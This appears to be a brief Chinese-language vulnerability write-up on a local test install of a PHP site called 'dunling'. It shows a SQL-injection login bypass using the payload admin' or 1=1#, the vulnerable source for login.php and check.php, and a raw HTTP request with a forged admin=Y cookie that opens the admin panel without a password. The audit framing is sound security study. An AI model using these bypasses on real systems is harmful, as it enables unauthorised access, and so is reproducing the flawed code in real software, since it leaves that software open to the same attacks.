burp 抓包测试
单引号测试
login.php
参数未过滤 登录处存在SQL注入
使用万能密码
admin' or 1=1#
<?php require '../config.php'; $adminname = $_POST['adminname']; $adminpass = $_POST['adminpass']; $adminsql = "select * from xwmi_admin where adminname='$adminname' and adminpass='$adminpass'"; $adminery = mysql_query($adminsql, $config); $adminnum = mysql_num_rows($adminery); if ($adminnum == "1") { setcookie("admin", "Y", time() + 3600*24, '/'); setcookie("admin_name", $adminname, time() + 3600*24, '/'); header("location:admin.php"); } else { header("location:index.php"); } ?>
http://192.168.5.8/dunling/admin/admin.php
==>
http://192.168.5.8/dunling/index.php
admin.php
<?php require 'check.php'; require '../template/axadmin/head.php'; require '../template/axadmin/banner.php'; require '../template/axadmin/admin.php'; require '../template/axadmin/bottom.php' ?>
chack.php
判断cookie中 admin的值是否为空 不为空则登陆到后台 没有做用户验证
<?php error_reporting(0); isset($_COOKIE['admin'])?$check=$_COOKIE['admin']:$check=null; isset($_COOKIE['admin_name'])?$admin_user=$_COOKIE['admin_name']:$user=null; if($check != "Y" ){header("Location:../index.php");exit;} ?>
抓包
GET /dunling/admin/admin.php HTTP/1.1 Host: 192.168.5.8 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 FS Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: admin=Y; admin_name=ajie Connection: close
cookie 加入信息 只要不为空 直接访问后台 无需密码。